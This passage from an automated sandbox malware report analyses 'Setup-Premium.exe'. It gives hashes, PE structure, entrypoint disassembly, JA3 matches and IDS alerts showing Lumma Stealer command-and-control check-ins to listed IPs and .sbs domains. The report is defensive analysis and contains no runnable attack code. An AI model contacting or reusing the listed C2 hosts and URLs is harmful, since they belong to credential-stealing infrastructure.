BcXqL6mjrfRn2e6SZ3cLMdbrvJF8+K9bEjK0z+DPrn/wowMPNg/sWBhdBb591VOmiiOgz82MQYX1oZvuxWVx8Ss8Y39FUpF/cGTcZLojkZK6/ZSGPHVUwgwezuarqDmRh2tnVahKh1zxiH7oFrg0dqApoWgloHFVuYES+Zx6Fwu8ffg2y+FHXsyJlLjARsT0dR3inuufunKnxFU0f0p8osK+QnybUWCcqfkqTetWNzB5Z8asqQvYhVbUlxqje0VAbhML1S+q4B7u3yifa6/t82x0LbRE1kHeNSO2USFPZmw2CUqF5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 23.227.38.65
                                                                                                                                                                                      https://confortdelaine.net/_t/c/A1020005-17FC1B6DB5BD9241-7C90090F?l=AACK/veH9NDjNFiJHV0SalQi1vBoTxR3+CaR+Tf08xqCc5VCUGXc4X3qdIj9jWGkdCLuES/KY7ELen4EAn/FdnHqCQjbGr4W7dR4kVnBVs6emUveso+FtMlz8WLaK/uswzzWIgI+d66EsmSIAjCn6klItun/LyfhMBm/RvF8+GmEHKuHrtJ8flo99oIsJ0uYTUcGFmrLFZUm12SmxPleHrWwUcLBo1d4hUAo1H1WkirRXbLvtA5AFdQBsGObYvK4Jtgjqj5gw5MW75B9OQ54AcZkBQKcIkmFcg1YL0qDKrf81oJq2UUhMNPl/V/7Lmh2Iy3+rO2Qx71WjGONpPizWLvD7lune8iRYENSNu1xGJst2AqunbtEprrHIRzSb0HY+HbbjV8np3yVIxGt0yN7Vmb5AARDME7dIwHUrmOBP8igeJjkCyNogIrPeE8U4hVHOONDQ0fRseICVU1/ok2ExphS1u92stTGUjMCSci5vEz5fgxKUh8PMHHlxtZQmBjhUQ==&c=AABwK74RGNbpZkLbXDMgwGkEPcjIolhPI3ARymI3akMXqIIsvKkft1xo30+FsOmyglvzbe8Yz6H3Z4LxZ/0aTZFTqxR6u54legvtFlkuV/Y5fZXwm/YmPanR9jUnqtc4hPznzAuUrT6U7sovDeUggzqrrdSH45Gj/uRY+/LazDIdhTbOxXQwN2GEeE643R7hV3n9WYZrcN1rJdKE4J3VridUK5YywIX20BWPmYGQ+iqSfiaJQlNujGzur2PRjzxDNGxHixYHr88wjhccRzzqt63TgH68hxiQWBS2WMJ8V78YgSedyDzugz0SWoHXC4lIoIg/mD4/gfyj8ItwLNrpe3LWbVMyaC3Ad4pEpAUwx2rMNAE2ZRJGw2pFtc10IGwr77FIEYyERoM+q4jxSJoFtK3knGK9ms7DQJFt8w0eTeON/BC9KGyQaC64dCNz+N4+Xs4aPX/XWl9TCa+jzc65pmbZE5Fi0IpF2S9gBcOFdJjQtmI1vA8o1jxGHT+6uixJoZsPaoFWVJAAyljwh/1U0kE7VmRRTmULBXD/WiUTWrHi0xFoOw6OPuSKQtWkN98CCafLvNNkYgEzgEh7ZP0U7YG2Ui/9zjmE3N9hxjTOSgO7rba70M6HBYbc4mR2U37DUGxUEU5CGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      • 23.227.38.65

                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                      • 172.67.173.224
                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                      • 172.67.152.13
                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                      • 172.67.205.156
                                                                                                                                                                                      • 172.67.140.193
                                                                                                                                                                                      • 104.21.79.35
                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                      • 172.67.173.224
                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                      • 172.67.152.13
                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                      • 172.67.205.156
                                                                                                                                                                                      • 172.67.140.193
                                                                                                                                                                                      • 104.21.79.35
                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                      • 172.67.173.224
                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                      • 172.67.152.13
                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                      • 172.67.205.156
                                                                                                                                                                                      • 172.67.140.193
                                                                                                                                                                                      • 104.21.79.35
                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                      • 172.67.173.224
                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                      • 172.67.152.13
                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                      • 172.67.205.156
                                                                                                                                                                                      • 172.67.140.193
                                                                                                                                                                                      • 104.21.79.35
                                                                                                                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                      • 172.67.173.224
                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                      • 172.67.152.13
                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                      • 172.67.205.156
                                                                                                                                                                                      • 172.67.140.193
                                                                                                                                                                                      • 104.21.79.35
                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                      • 172.67.173.224
                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                      • 172.67.152.13
                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                      • 172.67.205.156
                                                                                                                                                                                      • 172.67.140.193
                                                                                                                                                                                      • 104.21.79.35
                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                      • 172.67.173.224
                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                      • 172.67.152.13
                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                      • 172.67.205.156
                                                                                                                                                                                      • 172.67.140.193
                                                                                                                                                                                      • 104.21.79.35
                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                      • 172.67.173.224
                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                      • 172.67.152.13
                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                      • 172.67.205.156
                                                                                                                                                                                      • 172.67.140.193
                                                                                                                                                                                      • 104.21.79.35
                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                      • 172.67.173.224
                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                      • 172.67.152.13
                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                      • 172.67.205.156
                                                                                                                                                                                      • 172.67.140.193
                                                                                                                                                                                      • 104.21.79.35
                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                      • 172.67.173.224
                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                      • 172.67.152.13
                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                      • 172.67.205.156
                                                                                                                                                                                      • 172.67.140.193
                                                                                                                                                                                      • 104.21.79.35

                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                      No context

                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                      No created / dropped files found

                                                                                                                                                                                      Static File Info

                                                                                                                                                                                      General

                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Entropy (8bit):6.420307068406414
                                                                                                                                                                                      TrID:
                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                      File name:Setup-Premium.exe
                                                                                                                                                                                      File size:22'590'464 bytes
                                                                                                                                                                                      MD5:65ab8081d6a7f813a39bd06052fa5887
                                                                                                                                                                                      SHA1:3a2724a4b2e33d1aeb93eadf4e0e2916b5c0450d
                                                                                                                                                                                      SHA256:3dd3a9ee5cbe4e846be6f6921e8b1fe56317e5a292768625e8710061581d90ec
                                                                                                                                                                                      SHA512:9706ce98126ea72c9d1d64f35f49d3abdabd5b598ceb1543b6755b0f9455363ecc6d4d61efcccfb72f2a0f352a38df3457521e4a9ebb2059f2c0c075c11fcd93
                                                                                                                                                                                      SSDEEP:98304:70LRtlZ0qtmb1ZQnH1rYL1WzbYoawZOa2rqXFKngtg0tNO59cTLKnkhiIzII4pr4:KtzX61OtKEawZOaQg1tNOhnagprqjR7
                                                                                                                                                                                      TLSH:2B372842F9CB92F5DA476830449BA22F27345D019B28CBDBE745BA6EE8772D20D37305
                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........X..................D......p........0E...@...........................\.......Y...@................................

                                                                                                                                                                                      File Icon

                                                                                                                                                                                      Icon Hash:2d2e3797b32b2b99

                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                      General

                                                                                                                                                                                      Entrypoint:0x47dd70
                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                      Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                      OS Version Minor:1
                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                      File Version Minor:1
                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                                                                      Import Hash:c1a56dd2884ebae2645c18b421ad3aee

                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                      Instruction
                                                                                                                                                                                      jmp 00007EFD8CF2A150h
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                                      mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                      mov dword ptr [esp+10h], ebp
                                                                                                                                                                                      mov dword ptr [esp+14h], esi
                                                                                                                                                                                      mov dword ptr [esp+18h], edi
                                                                                                                                                                                      mov dword ptr [esp], eax
                                                                                                                                                                                      mov dword ptr [esp+04h], ecx
                                                                                                                                                                                      call 00007EFD8CF02F36h
                                                                                                                                                                                      mov eax, dword ptr [esp+08h]
                                                                                                                                                                                      mov edi, dword ptr [esp+18h]
                                                                                                                                                                                      mov esi, dword ptr [esp+14h]
                                                                                                                                                                                      mov ebp, dword ptr [esp+10h]
                                                                                                                                                                                      mov ebx, dword ptr [esp+1Ch]
                                                                                                                                                                                      add esp, 28h
                                                                                                                                                                                      retn 0004h
                                                                                                                                                                                      ret
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      sub esp, 08h
                                                                                                                                                                                      mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                                                      mov edx, dword ptr [ecx]
                                                                                                                                                                                      mov eax, esp
                                                                                                                                                                                      mov dword ptr [edx+04h], eax
                                                                                                                                                                                      sub eax, 00010000h
                                                                                                                                                                                      mov dword ptr [edx], eax
                                                                                                                                                                                      add eax, 00000BA0h
                                                                                                                                                                                      mov dword ptr [edx+08h], eax
                                                                                                                                                                                      mov dword ptr [edx+0Ch], eax
                                                                                                                                                                                      lea edi, dword ptr [ecx+34h]
                                                                                                                                                                                      mov dword ptr [edx+18h], ecx
                                                                                                                                                                                      mov dword ptr [edi], edx
                                                                                                                                                                                      mov dword ptr [esp+04h], edi
                                                                                                                                                                                      call 00007EFD8CF2C5B4h
                                                                                                                                                                                      cld
                                                                                                                                                                                      call 00007EFD8CF2B63Eh
                                                                                                                                                                                      call 00007EFD8CF2A279h
                                                                                                                                                                                      add esp, 08h
                                                                                                                                                                                      ret
                                                                                                                                                                                      jmp 00007EFD8CF2C460h
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      mov ebx, dword ptr [esp+04h]
                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                      mov dword ptr fs:[00000034h], 00000000h
                                                                                                                                                                                      mov ecx, dword ptr [ebx+04h]
                                                                                                                                                                                      cmp ecx, 00000000h
                                                                                                                                                                                      je 00007EFD8CF2C461h
                                                                                                                                                                                      mov eax, ecx
                                                                                                                                                                                      shl eax, 02h
                                                                                                                                                                                      sub esp, eax
                                                                                                                                                                                      mov edi, esp
                                                                                                                                                                                      mov esi, dword ptr [ebx+08h]
                                                                                                                                                                                      cld
                                                                                                                                                                                      rep movsd

                                                                                                                                                                                      Data Directories

                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x153f0000x480.idata
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x15c60000x1f54.rsrc
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x15400000x84f24.reloc
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x1455ac00xbc.data
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                      Sections

                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                      .text0x10000xa0cab80xa0cc004bbcf131ed89128de29b28f1b2e76a9cunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                      .rdata0xa0e0000xa446540xa448003399e65d1839104121309f842fb99c21unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                      .data0x14530000xebbec0xb2400f02a4e3ba890dd9b9b59be799b0909b1False0.40694852296633943data6.223021719147453IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                      .idata0x153f0000x4800x6001a73e78e7c3dd8e12dd66d806f5f0dbcFalse0.365234375data4.119800823396545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                      .reloc0x15400000x84f240x85000ddf0fc1540d1ef9d5f47fa0a39f99867False0.5463206355733082data6.637522283069667IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                      .symtab0x15c50000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                      .rsrc0x15c60000x1f540x2000448aa04f986ae889e5596b4b279afa5dFalse0.3302001953125data4.666338698942476IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                      Resources

                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                      RT_ICON0x15c61d40x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5675675675675675
                                                                                                                                                                                      RT_ICON0x15c62fc0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4486994219653179
                                                                                                                                                                                      RT_ICON0x15c68640x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.4637096774193548
                                                                                                                                                                                      RT_ICON0x15c6b4c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.3935018050541516
                                                                                                                                                                                      RT_GROUP_ICON0x15c73f40x3edataEnglishUnited States0.8387096774193549
                                                                                                                                                                                      RT_VERSION0x15c74340x4f4dataEnglishUnited States0.2657728706624606
                                                                                                                                                                                      RT_MANIFEST0x15c79280x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924

                                                                                                                                                                                      Imports

                                                                                                                                                                                      DLLImport
                                                                                                                                                                                      kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetThreadPriority, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateWaitableTimerA, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                                                                                                                                                                                      Possible Origin

                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                      2024-10-13T01:44:13.809431+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704188.114.96.3443TCP
                                                                                                                                                                                      2024-10-13T01:44:13.809431+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704188.114.96.3443TCP
                                                                                                                                                                                      2024-10-13T01:44:13.830191+02002056570ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)1192.168.2.5523561.1.1.153UDP
                                                                                                                                                                                      2024-10-13T01:44:14.362224+02002056571ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI)1192.168.2.549705188.114.96.3443TCP
                                                                                                                                                                                      2024-10-13T01:44:14.796868+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705188.114.96.3443TCP
                                                                                                                                                                                      2024-10-13T01:44:14.796868+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705188.114.96.3443TCP
                                                                                                                                                                                      2024-10-13T01:44:14.803554+02002056568ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)1192.168.2.5541131.1.1.153UDP
                                                                                                                                                                                      2024-10-13T01:44:14.812869+02002056566ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)1192.168.2.5635611.1.1.153UDP
                                                                                                                                                                                      2024-10-13T01:44:15.332555+02002056567ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI)1192.168.2.549707172.67.152.13443TCP
                                                                                                                                                                                      2024-10-13T01:44:15.767746+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549707172.67.152.13443TCP
                                                                                                                                                                                      2024-10-13T01:44:15.767746+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549707172.67.152.13443TCP
                                                                                                                                                                                      2024-10-13T01:44:15.770723+02002056564ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs)1192.168.2.5571191.1.1.153UDP
                                                                                                                                                                                      2024-10-13T01:44:17.105383+02002056565ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI)1192.168.2.549710172.67.205.156443TCP
                                                                                                                                                                                      2024-10-13T01:44:17.530500+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549710172.67.205.156443TCP
                                                                                                                                                                                      2024-10-13T01:44:17.530500+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549710172.67.205.156443TCP
                                                                                                                                                                                      2024-10-13T01:44:17.533350+02002056562ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs)1192.168.2.5631841.1.1.153UDP
                                                                                                                                                                                      2024-10-13T01:44:18.054859+02002056563ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI)1192.168.2.549714172.67.140.193443TCP
                                                                                                                                                                                      2024-10-13T01:44:19.560631+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549714172.67.140.193443TCP
                                                                                                                                                                                      2024-10-13T01:44:19.560631+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549714172.67.140.193443TCP
                                                                                                                                                                                      2024-10-13T01:44:19.562795+02002056560ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs)1192.168.2.5591391.1.1.153UDP
                                                                                                                                                                                      2024-10-13T01:44:20.054032+02002056561ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI)1192.168.2.549724172.67.173.224443TCP
                                                                                                                                                                                      2024-10-13T01:44:20.503224+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549724172.67.173.224443TCP
                                                                                                                                                                                      2024-10-13T01:44:20.503224+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549724172.67.173.224443TCP
                                                                                                                                                                                      2024-10-13T01:44:20.524057+02002056558ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs)1192.168.2.5509681.1.1.153UDP
                                                                                                                                                                                      2024-10-13T01:44:21.017673+02002056559ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI)1192.168.2.549729104.21.79.35443TCP
                                                                                                                                                                                      2024-10-13T01:44:21.464056+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549729104.21.79.35443TCP
                                                                                                                                                                                      2024-10-13T01:44:21.464056+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549729104.21.79.35443TCP
                                                                                                                                                                                      2024-10-13T01:44:21.465912+02002056556ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs)1192.168.2.5602321.1.1.153UDP
                                                                                                                                                                                      2024-10-13T01:44:21.974390+02002056557ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI)1192.168.2.549738188.114.96.3443TCP
                                                                                                                                                                                      2024-10-13T01:44:22.318748+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549738188.114.96.3443TCP
                                                                                                                                                                                      2024-10-13T01:44:22.318748+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549738188.114.96.3443TCP
                                                                                                                                                                                      2024-10-13T01:44:23.583545+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.549744104.102.49.254443TCP
                                                                                                                                                                                      2024-10-13T01:44:24.377334+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549751104.21.53.8443TCP
                                                                                                                                                                                      2024-10-13T01:44:24.377334+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549751104.21.53.8443TCP
                                                                                                                                                                                      2024-10-13T01:44:25.412146+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549757104.21.53.8443TCP
                                                                                                                                                                                      2024-10-13T01:44:25.412146+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549757104.21.53.8443TCP

                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                      Oct 13, 2024 01:44:12.481951952 CEST49704443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:12.481978893 CEST44349704188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:12.482048035 CEST49704443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:12.483488083 CEST49704443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:12.483504057 CEST44349704188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:12.974108934 CEST44349704188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:12.974183083 CEST49704443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:12.977952957 CEST49704443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:12.977962017 CEST44349704188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:12.978260994 CEST44349704188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:13.032001019 CEST49704443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:13.363359928 CEST49704443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:13.363359928 CEST49704443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:13.363854885 CEST44349704188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:13.809506893 CEST44349704188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:13.809756041 CEST44349704188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:13.809938908 CEST49704443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:13.813750982 CEST49704443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:13.813750982 CEST49704443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:13.813797951 CEST44349704188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:13.813826084 CEST44349704188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:13.845181942 CEST49705443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:13.845277071 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:13.845393896 CEST49705443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:13.845648050 CEST49705443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:13.845680952 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:14.361943960 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:14.362224102 CEST49705443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:14.364353895 CEST49705443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:14.364386082 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:14.364682913 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:14.366183043 CEST49705443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:14.366223097 CEST49705443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:14.366266012 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:14.796938896 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:14.797209978 CEST44349705188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:14.797297001 CEST49705443192.168.2.5188.114.96.3
